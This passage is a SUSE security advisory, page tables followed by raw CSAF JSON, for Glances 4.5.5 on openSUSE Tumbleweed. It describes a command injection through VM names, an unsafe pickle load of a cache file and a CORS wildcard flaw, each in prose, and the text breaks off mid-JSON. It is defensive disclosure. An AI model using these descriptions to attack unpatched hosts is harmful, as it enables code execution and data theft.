|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
5.3 (Medium)
Affected products
Recommended
16 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
moderate
Affected products
Recommended
16 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
References
17 references
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "glances-common-4.5.5-1.1 on GA media",
"title": "Title of the patch"
},
{
"category": "description",
"text": "These are all security issues fixed in the glances-common-4.5.5-1.1 package on the GA media of openSUSE Tumbleweed.",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-Tumbleweed-2026-11122",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2026_11122-1.json"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-46606 page",
"url": "https://www.suse.com/security/cve/CVE-2026-46606/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-46607 page",
"url": "https://www.suse.com/security/cve/CVE-2026-46607/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-46608 page",
"url": "https://www.suse.com/security/cve/CVE-2026-46608/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-46611 page",
"url": "https://www.suse.com/security/cve/CVE-2026-46611/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-53925 page",
"url": "https://www.suse.com/security/cve/CVE-2026-53925/"
}
],
"title": "glances-common-4.5.5-1.1 on GA media",
"tracking": {
"current_release_date": "2026-06-25T00:00:00Z",
"generator": {
"date": "2026-06-25T00:00:00Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2026:11122-1",
"initial_release_date": "2026-06-25T00:00:00Z",
"revision_history": [
{
"date": "2026-06-25T00:00:00Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "glances-common-4.5.5-1.1.aarch64",
"product": {
"name": "glances-common-4.5.5-1.1.aarch64",
"product_id": "glances-common-4.5.5-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "python311-Glances-4.5.5-1.1.aarch64",
"product": {
"name": "python311-Glances-4.5.5-1.1.aarch64",
"product_id": "python311-Glances-4.5.5-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "python313-Glances-4.5.5-1.1.aarch64",
"product": {
"name": "python313-Glances-4.5.5-1.1.aarch64",
"product_id": "python313-Glances-4.5.5-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "python314-Glances-4.5.5-1.1.aarch64",
"product": {
"name": "python314-Glances-4.5.5-1.1.aarch64",
"product_id": "python314-Glances-4.5.5-1.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "glances-common-4.5.5-1.1.ppc64le",
"product": {
"name": "glances-common-4.5.5-1.1.ppc64le",
"product_id": "glances-common-4.5.5-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python311-Glances-4.5.5-1.1.ppc64le",
"product": {
"name": "python311-Glances-4.5.5-1.1.ppc64le",
"product_id": "python311-Glances-4.5.5-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python313-Glances-4.5.5-1.1.ppc64le",
"product": {
"name": "python313-Glances-4.5.5-1.1.ppc64le",
"product_id": "python313-Glances-4.5.5-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python314-Glances-4.5.5-1.1.ppc64le",
"product": {
"name": "python314-Glances-4.5.5-1.1.ppc64le",
"product_id": "python314-Glances-4.5.5-1.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "glances-common-4.5.5-1.1.s390x",
"product": {
"name": "glances-common-4.5.5-1.1.s390x",
"product_id": "glances-common-4.5.5-1.1.s390x"
}
},
{
"category": "product_version",
"name": "python311-Glances-4.5.5-1.1.s390x",
"product": {
"name": "python311-Glances-4.5.5-1.1.s390x",
"product_id": "python311-Glances-4.5.5-1.1.s390x"
}
},
{
"category": "product_version",
"name": "python313-Glances-4.5.5-1.1.s390x",
"product": {
"name": "python313-Glances-4.5.5-1.1.s390x",
"product_id": "python313-Glances-4.5.5-1.1.s390x"
}
},
{
"category": "product_version",
"name": "python314-Glances-4.5.5-1.1.s390x",
"product": {
"name": "python314-Glances-4.5.5-1.1.s390x",
"product_id": "python314-Glances-4.5.5-1.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "glances-common-4.5.5-1.1.x86_64",
"product": {
"name": "glances-common-4.5.5-1.1.x86_64",
"product_id": "glances-common-4.5.5-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "python311-Glances-4.5.5-1.1.x86_64",
"product": {
"name": "python311-Glances-4.5.5-1.1.x86_64",
"product_id": "python311-Glances-4.5.5-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "python313-Glances-4.5.5-1.1.x86_64",
"product": {
"name": "python313-Glances-4.5.5-1.1.x86_64",
"product_id": "python313-Glances-4.5.5-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "python314-Glances-4.5.5-1.1.x86_64",
"product": {
"name": "python314-Glances-4.5.5-1.1.x86_64",
"product_id": "python314-Glances-4.5.5-1.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "openSUSE Tumbleweed",
"product": {
"name": "openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:tumbleweed"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "glances-common-4.5.5-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64"
},
"product_reference": "glances-common-4.5.5-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "glances-common-4.5.5-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le"
},
"product_reference": "glances-common-4.5.5-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "glances-common-4.5.5-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x"
},
"product_reference": "glances-common-4.5.5-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "glances-common-4.5.5-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64"
},
"product_reference": "glances-common-4.5.5-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-Glances-4.5.5-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64"
},
"product_reference": "python311-Glances-4.5.5-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-Glances-4.5.5-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le"
},
"product_reference": "python311-Glances-4.5.5-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-Glances-4.5.5-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x"
},
"product_reference": "python311-Glances-4.5.5-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-Glances-4.5.5-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64"
},
"product_reference": "python311-Glances-4.5.5-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-Glances-4.5.5-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64"
},
"product_reference": "python313-Glances-4.5.5-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-Glances-4.5.5-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le"
},
"product_reference": "python313-Glances-4.5.5-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-Glances-4.5.5-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x"
},
"product_reference": "python313-Glances-4.5.5-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-Glances-4.5.5-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64"
},
"product_reference": "python313-Glances-4.5.5-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python314-Glances-4.5.5-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64"
},
"product_reference": "python314-Glances-4.5.5-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python314-Glances-4.5.5-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le"
},
"product_reference": "python314-Glances-4.5.5-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python314-Glances-4.5.5-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x"
},
"product_reference": "python314-Glances-4.5.5-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python314-Glances-4.5.5-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
},
"product_reference": "python314-Glances-4.5.5-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-46606",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-46606"
}
],
"notes": [
{
"category": "general",
"text": "Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.5, the Glances KVM/QEMU monitoring engine (glances/plugins/vms/engines/virsh.py) passes VM domain names, read directly from virsh list --all output, into f-string command templates that are processed by secure_popen(). secure_popen() is explicitly designed to interpret \u0026\u0026, |, and \u003e as shell operators. Because domain names are never sanitised before interpolation, any user with the ability to create or rename a KVM/QEMU virtual machine can execute arbitrary commands as the OS user running Glances - commonly root on hypervisor hosts. This vulnerability is fixed in 4.5.5.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-46606",
"url": "https://www.suse.com/security/cve/CVE-2026-46606"
},
{
"category": "external",
"summary": "SUSE Bug 1268800 for CVE-2026-46606",
"url": "https://bugzilla.suse.com/1268800"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-25T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-46606"
},
{
"cve": "CVE-2026-46607",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-46607"
}
],
"notes": [
{
"category": "general",
"text": "Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.5, glances/outdated.py uses pickle.load() to read a version-check cache file stored at a predictable, world-accessible path (~/.cache/glances/glances-version.db or $XDG_CACHE_HOME/glances/glances-version.db). No integrity check, signature verification, or format validation is performed before deserialization. An attacker with write access to that path - through any of several realistic local or container-level scenarios - can plant a malicious pickle file and achieve arbitrary code execution as the OS user running Glances the next time it starts with version checking enabled (the default). This vulnerability is fixed in 4.5.5.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-46607",
"url": "https://www.suse.com/security/cve/CVE-2026-46607"
},
{
"category": "external",
"summary": "SUSE Bug 1268854 for CVE-2026-46607",
"url": "https://bugzilla.suse.com/1268854"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-25T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-46607"
},
{
"cve": "CVE-2026-46608",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-46608"
}
],
"notes": [
{
"category": "general",
"text": "Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.5, the Glances XML-RPC server (glances -s) introduced a configurable CORS origin list in version 4.5.3 as a mitigation for CVE-2026-33533. However, the implementation silently falls back to Access-Control-Allow-Origin: * whenever cors_origins contains more than one entry. An operator who configures an explicit two-entry allowlist (e.g. two internal dashboard origins) intending to restrict browser access instead receives the unrestricted wildcard. A malicious web page served from any origin can issue a CORS simple request to /RPC2 and read the full system monitoring dataset without the victim\u0027s knowledge. This vulnerability is fixed in 4.5.5.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-46608",
"url": "https://www.suse.com/security/cve/CVE-2026-46608"
},
{
"category": "external",
"summary": "SUSE Bug 1268855 for CVE-2026-46608",
"url": "https://bugzilla.suse.com/1268855"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
